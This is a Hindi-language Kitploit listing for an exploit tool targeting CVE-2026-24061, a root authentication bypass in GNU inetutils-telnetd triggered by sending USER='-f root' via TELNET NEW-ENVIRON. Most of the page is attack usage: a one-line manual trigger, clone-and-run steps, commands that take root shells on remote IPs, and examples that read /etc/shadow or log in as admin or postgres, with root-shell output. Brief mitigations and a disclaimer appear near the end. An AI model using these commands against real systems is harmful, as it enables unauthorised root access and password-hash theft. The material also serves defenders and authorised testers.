Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/balgan/cve-2026-24061
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubbalgan/cve-2026-24061

CVE-2026-24061

inetutils-telnetd प्रमाणीकरण बाईपास - कार्यशील

रिपॉजिटरी देखें
397 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061 — inetutils-telnetd प्रमाणीकरण बाईपास

GNU inetutils-telnetd में प्रमाणीकरण बाईपास भेद्यता के लिए एक proof-of-concept एक्सप्लॉइट।

अवलोकन

CVE-2026-24061 एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो inetutils-telnetd संस्करण 1.9.3 से 2.7 को प्रभावित करती है। यह एक दूरस्थ हमलावर को बिना कोई क्रेडेंशियल प्रदान किए कमजोर सिस्टम पर रूट शेल प्राप्त करने की अनुमति देती है।

भेद्यता विवरण

फ़ील्डमान
CVE IDCVE-2026-24061
प्रभावित सॉफ़्टवेयरGNU inetutils-telnetd
प्रभावित संस्करण1.9.3 – 2.7
भेद्यता प्रकारप्रमाणीकरण बाईपास
CVSS स्कोरगंभीर
हमला वेक्टरनेटवर्क

यह कैसे काम करता है

यह भेद्यता उस दोष का फायदा उठाती है जिसमें telnetd प्रोटोकॉल नेगोशिएशन के दौरान TELNET NEW-ENVIRON विकल्प (RFC 1572) के माध्यम से प्राप्त USER पर्यावरण चर को संभालता है।

  1. TELNET प्रोटोकॉल नेगोशिएशन: जब कोई क्लाइंट कनेक्ट होता है, तो सर्वर और क्लाइंट NEW-ENVIRON विकल्प सहित क्षमताओं पर बातचीत करते हैं, जो क्लाइंट को पर्यावरण चर भेजने की अनुमति देता है।

  2. दुर्भावनापूर्ण USER मान: एक्सप्लॉइट इस नेगोशिएशन चरण के दौरान पर्यावरण चर के रूप में USER=-f root भेजता है।

  3. असुरक्षित तर्क पासिंग: कमजोर telnetd इस मान को बिना सैनिटाइज़ किए login प्रोग्राम को पास करता है।

  4. कमांड इंजेक्शन: login प्रोग्राम -f root को कमांड-लाइन फ़्लैग के रूप में व्याख्या करता है:

    • -f = "बिना प्रमाणीकरण के लॉगिन बलपूर्वक करें"
    • root = लॉगिन करने के लिए उपयोगकर्ता नाम
  5. रूट एक्सेस: हमलावर को बिना पासवर्ड के पूछे रूट शेल मिल जाता है।

मुख्य समस्या

root@kitploit:~
क्लाइंट भेजता है:  USER = "-f root"
telnetd चलाता है:  login -f root
परिणाम:        बिना प्रमाणीकरण के रूट शेल प्रदान किया गया

यह कमजोर telnetd वाले सिस्टम पर USER='-f root' telnet -a localhost चलाने के बराबर है।

आवश्यकताएँ

  • Python 3.6+
  • कोई बाहरी निर्भरता नहीं (केवल मानक लाइब्रेरी का उपयोग करता है)

स्थापना

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

उपयोग

root@kitploit:~
./exploit.py [OPTIONS] <target>

विकल्प

विकल्पविवरणडिफ़ॉल्ट
hostलक्ष्य होस्टनाम या IP पताआवश्यक
-p, --portलक्ष्य पोर्ट23
-u, --userइंजेक्ट करने के लिए USER मान-f root
-c, --commandएकल कमांड चलाएँ (गैर-इंटरैक्टिव)कोई नहीं
-t, --timeoutकनेक्शन टाइमआउट सेकंड में10

उदाहरण

localhost पर इंटरैक्टिव रूट शेल:

root@kitploit:~
./exploit.py localhost

दूरस्थ होस्ट पर इंटरैक्टिव रूट शेल:

root@kitploit:~
./exploit.py 192.168.1.100

एकल कमांड निष्पादित करें और बाहर निकलें:

root@kitploit:~
./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

किसी भिन्न उपयोगकर्ता के रूप में लॉगिन करें:

root@kitploit:~
./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

गैर-मानक पोर्ट:

root@kitploit:~
./exploit.py -p 2323 localhost

विकल्पों को संयोजित करें:

root@kitploit:~
./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

इंटरैक्टिव मोड

जब -c फ़्लैग के बिना चलाया जाता है, तो एक्सप्लॉइट आपको एक इंटरैक्टिव शेल में ले जाता है:

  • उचित टर्मिनल हैंडलिंग के साथ पूर्ण TTY समर्थन
  • बाहर निकलने और कनेक्शन बंद करने के लिए Ctrl+] दबाएँ
  • बाधित करने के लिए Ctrl+C दबाएँ

आउटपुट उदाहरण

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - inetutils-telnetd Authentication Bypass    ║
║  Affects: inetutils-telnetd 1.9.3 - 2.7                      ║
╚══════════════════════════════════════════════════════════════╝

[*] Connected to 192.168.1.100:23
[*] Negotiating TELNET options...
[*] Agreed to NEW-ENVIRON (sending USER='-f root')
[+] Sent USER='-f root' via NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

शमन

तत्काल कार्रवाई

  1. telnetd अक्षम करें: यदि सख्ती से आवश्यक नहीं है, तो telnet सेवा को पूरी तरह से अक्षम करें

    root@kitploit:~
    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. इसके बजाय SSH का उपयोग करें: दूरस्थ पहुंच के लिए telnet को SSH से बदलें

    root@kitploit:~
    sudo apt install openssh-server
    
  3. फ़ायरवॉल नियम: अविश्वसनीय नेटवर्क से पोर्ट 23 को ब्लॉक करें

    root@kitploit:~
    sudo ufw deny 23/tcp
    

दीर्घकालिक समाधान

  • उपलब्ध होने पर inetutils के पैच किए गए संस्करण में अपडेट करें
  • सुरक्षा पैच के लिए विक्रेता सलाहकारों की निगरानी करें

तकनीकी विवरण

एक्सप्लॉइट एक न्यूनतम TELNET क्लाइंट लागू करता है जो:

  1. लक्ष्य के लिए TCP कनेक्शन स्थापित करता है
  2. TELNET विकल्प नेगोशिएशन (DO/DONT/WILL/WONT) का जवाब देता है
  3. जब सर्वर NEW-ENVIRON के माध्यम से पर्यावरण चर का अनुरोध करता है:
    • ENV_IS प्रतिक्रिया में USER=-f root भेजता है
  4. टर्मिनल प्रकार (TTYPE) और विंडो आकार (NAWS) नेगोशिएशन को संभालता है
  5. इंटरैक्टिव या कमांड-निष्पादन मोड प्रदान करता है

प्रासंगिक RFC

  • RFC 854 — TELNET प्रोटोकॉल विनिर्देश
  • RFC 1572 — TELNET पर्यावरण विकल्प

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • इस एक्सप्लॉइट का उपयोग केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अधिकांश न्यायक्षेत्रों में अवैध है
  • लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं

लाइसेंस

MIT लाइसेंस — विवरण के लिए LICENSE देखें।

संदर्भ

  • CVE-2026-24061 विवरण
  • GNU inetutils
  • TELNET प्रोटोकॉल RFC 854
टूल डाउनलोड करें